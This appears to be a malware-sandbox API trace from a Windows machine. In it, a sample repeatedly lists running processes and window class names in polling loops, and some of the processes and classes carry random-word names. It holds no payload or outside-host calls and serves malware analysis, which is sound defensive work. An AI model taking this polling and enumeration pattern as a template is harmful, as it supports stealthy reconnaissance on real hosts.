Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.108] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0229.109] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.109] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0229.110] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.111] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0229.111] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0229.111] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.112] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.112] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.113] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.113] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0229.114] CloseHandle (hObject=0x520) returned 1 [0229.114] Sleep (dwMilliseconds=0x64) [0229.220] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x520 [0229.222] Process32First (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.223] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0229.223] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0229.224] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.224] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0229.225] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.225] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0229.225] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0229.226] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0229.226] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0229.227] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.227] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.228] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.228] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.229] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.229] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0229.230] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.230] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.230] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0229.231] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0229.231] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0229.232] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.232] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0229.233] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0229.233] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0239.330] Process32First (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 314 os_tid = 0x4ec [0228.716] EnumWindows (lpEnumFunc=0x2b94058, lParam=0x2b80000) returned 1 [0228.769] GetClassNameA (in: hWnd=0x20080, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.769] GetClassNameA (in: hWnd=0x200f2, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="ATL:000007FEF55B52C0") returned 20 [0228.769] GetClassNameA (in: hWnd=0x2010a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0228.769] GetClassNameA (in: hWnd=0x2006a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0228.769] GetClassNameA (in: hWnd=0x2012c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.769] GetClassNameA (in: hWnd=0x20134, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.769] GetClassNameA (in: hWnd=0x2012e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.769] GetClassNameA (in: hWnd=0x200f4, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.769] GetClassNameA (in: hWnd=0x20128, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.769] GetClassNameA (in: hWnd=0x20126, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.769] GetClassNameA (in: hWnd=0x4015a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.769] GetClassNameA (in: hWnd=0x30144, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Button") returned 6 [0228.769] GetClassNameA (in: hWnd=0x40140, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0228.770] GetClassNameA (in: hWnd=0x60096, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.770] GetClassNameA (in: hWnd=0x400e8, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.770] GetClassNameA (in: hWnd=0x400c2, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.770] GetClassNameA (in: hWnd=0x800de, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.770] GetClassNameA (in: hWnd=0x200e2, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0228.770] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0228.770] GetClassNameA (in: hWnd=0x20028, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0228.770] GetClassNameA (in: hWnd=0x400ec, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0228.770] GetClassNameA (in: hWnd=0x4004a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0228.770] GetClassNameA (in: hWnd=0x2004c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0228.770] GetClassNameA (in: hWnd=0x2004e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0228.770] GetClassNameA (in: hWnd=0x300fa, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0228.770] GetClassNameA (in: hWnd=0x400a6, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Media Center SSO") returned 16 [0228.770] GetClassNameA (in: hWnd=0x20054, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="ATL:000007FEFBD041F0") returned 20 [0228.770] GetClassNameA (in: hWnd=0x20090, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0228.770] GetClassNameA (in: hWnd=0x20084, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0228.770] GetClassNameA (in: hWnd=0x20070, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0228.770] GetClassNameA (in: hWnd=0x20086, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0228.770] GetClassNameA (in: hWnd=0x400c6, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.770] GetClassNameA (in: hWnd=0x400ca, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0228.770] GetClassNameA (in: hWnd=0x400b4, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0228.770] GetClassNameA (in: hWnd=0x400aa, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.771] GetClassNameA (in: hWnd=0x400da, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.771] GetClassNameA (in: hWnd=0x500e4, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.771] GetClassNameA (in: hWnd=0x400b2, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0228.771] GetClassNameA (in: hWnd=0x6008a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0228.771] GetClassNameA (in: hWnd=0x2010c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0228.771] GetClassNameA (in: hWnd=0x20114, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0228.771] GetClassNameA (in: hWnd=0x2012a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.771] GetClassNameA (in: hWnd=0x2014c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.771] GetClassNameA (in: hWnd=0x2008e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0228.771] GetClassNameA (in: hWnd=0x20156, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0228.771] GetClassNameA (in: hWnd=0x4013c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0228.771] GetClassNameA (in: hWnd=0x60098, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0228.771] GetClassNameA (in: hWnd=0x6009c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0228.771] GetClassNameA (in: hWnd=0x101ae, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="populationopenings") returned 18 [0228.771] GetClassNameA (in: hWnd=0x401ba, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0228.771] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Doctrine_alcohol_win") returned 20 [0228.771] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="sensorsDemocratcls") returned 18 [0228.771] GetClassNameA (in: hWnd=0x101a2, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Const_advertisement_window") returned 26 [0228.771] GetClassNameA (in: hWnd=0x1019e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="BagsShakiratourismwnd") returned 21 [0228.771] GetClassNameA (in: hWnd=0x1019a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="dallasRwnd") returned 10 [0228.771] GetClassNameA (in: hWnd=0x10196, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="wooden") returned 6 [0228.772] GetClassNameA (in: hWnd=0x10192, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="SpiceDespitecls") returned 15 [0228.772] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="smithwin") returned 8 [0228.772] GetClassNameA (in: hWnd=0x1018a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="zoo_differ_cls") returned 14 [0228.772] GetClassNameA (in: hWnd=0x10186, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="ruby_") returned 5 [0228.772] GetClassNameA (in: hWnd=0x10182, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="birthbeanclass") returned 14 [0228.772] GetClassNameA (in: hWnd=0x1017e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="objectsvirusIsraeli") returned 19 [0228.772] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="seekerapp") returned 9 [0228.772] GetClassNameA (in: hWnd=0x10176, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="potentiallywin") returned 14 [0228.772] GetClassNameA (in: hWnd=0x10172, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Wheneverwnd") returned 11 [0228.772] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="knewDifferenceskarenwnd") returned 23 [0228.772] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Definitelycls") returned 13 [0228.772] GetClassNameA (in: hWnd=0x10166, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="receptor_paintings_cls") returned 22 [0228.772] GetClassNameA (in: hWnd=0x10162, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="beveragesTapesdodclass") returned 22 [0228.772] GetClassNameA (in: hWnd=0x60110, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="abortion_Serbia_effect_") returned 23 [0228.772] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0228.772] GetClassNameA (in: hWnd=0x20020, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="#43") returned 3 [0228.772] GetClassNameA (in: hWnd=0x10058, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0228.772] GetClassNameA (in: hWnd=0x30044, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0228.772] GetClassNameA (in: hWnd=0x20018, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0228.772] GetClassNameA (in: hWnd=0x30062, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0228.772] GetClassNameA (in: hWnd=0x600a0, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0228.772] GetClassNameA (in: hWnd=0x20108, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x20148, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0228.773] GetClassNameA (in: hWnd=0x4013e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x40112, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x2005c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x20066, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x101b0, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x501bc, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x101ac, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x101a8, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x101a4, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x101a0, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x1019c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x10198, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x10194, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x10190, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x1018c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x10188, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x10184, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x10180, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x1017c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x10178, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x10174, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.773] GetClassNameA (in: hWnd=0x10170, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.774] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.774] GetClassNameA (in: hWnd=0x10168, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.774] GetClassNameA (in: hWnd=0x10164, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.774] GetClassNameA (in: hWnd=0x10160, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.774] GetClassNameA (in: hWnd=0x700a4, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.774] GetClassNameA (in: hWnd=0x2002a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.774] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.774] GetClassNameA (in: hWnd=0x2001a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.774] GetClassNameA (in: hWnd=0x20076, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0228.774] GetClassNameA (in: hWnd=0x6009a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.774] GetClassNameA (in: hWnd=0x2005e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.774] Sleep (dwMilliseconds=0x64) [0228.900] EnumWindows (lpEnumFunc=0x2b94058, lParam=0x2b80000) returned 1 [0228.901] 